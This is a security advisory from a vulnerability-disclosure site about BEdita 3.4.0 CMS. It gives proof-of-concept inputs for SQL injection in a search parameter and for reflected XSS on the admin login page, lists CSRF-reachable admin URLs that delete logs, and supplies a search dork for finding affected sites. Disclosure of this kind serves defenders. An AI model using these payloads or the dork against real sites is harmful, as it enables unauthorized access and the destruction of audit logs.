BEdita 3.4.0 CMS Multiple Vulnerabilities

2014-06-02 / 2014-06-03
Credit: Smash_
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
CWE-89
CWE-352
Dork: intext:\"Proudly powered by BEdita\"

#Title: BEdita 3.4.0 CMS Multiple Vulnerabilities #Vendor: bedita.com #Demo: site.demo.bedita.com #Version: 3.4.0 (Latest ATM) #Date: 02.06.14 #Dork: intext:"Proudly powered by BEdita" #Contact: smash[at]devilteam.pl #1 - SQL Injection via user_created So, anyone is able to search for publications using specific user ID. For example, if i would like to seek for news from user with ID 1, url would look like: host/search/user_created:1 Parameter user_created is vulnerable to sql injection - sql error appears when parameter is incorrectly modified. PoC: site.demo.bedita.com/search/user_created:1' and '1'='1 site.demo.bedita.com/search/user_created:1' and '1'='2 #2 - Cross Site Scripting at admin panel (login page) Since url is being used in javascript as remote_url_response parameter, attacker is able to execute xss because of poor filtration. host/authentications/xss";%20alert(666);%20lel="123 Source will look like: <script type="text/javascript"> var remote_url_response = "/pages/helpOnline/authentications/xss"; alert(666); lel="123"; (...) PoC: manage.demo.bedita.com/authentications/xss";%20alert(666);%20lel="123 #3 CSRF a) Delete system events localhost/bedita/index.php/admin/deleteEventLog b) Delete system logs localhost/bedita/index.php/admin/emptySystemLog c) Delete mail logs localhost/bedita/index.php/admin/deleteAllMailLogs

References:

http://devilteam.pl/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top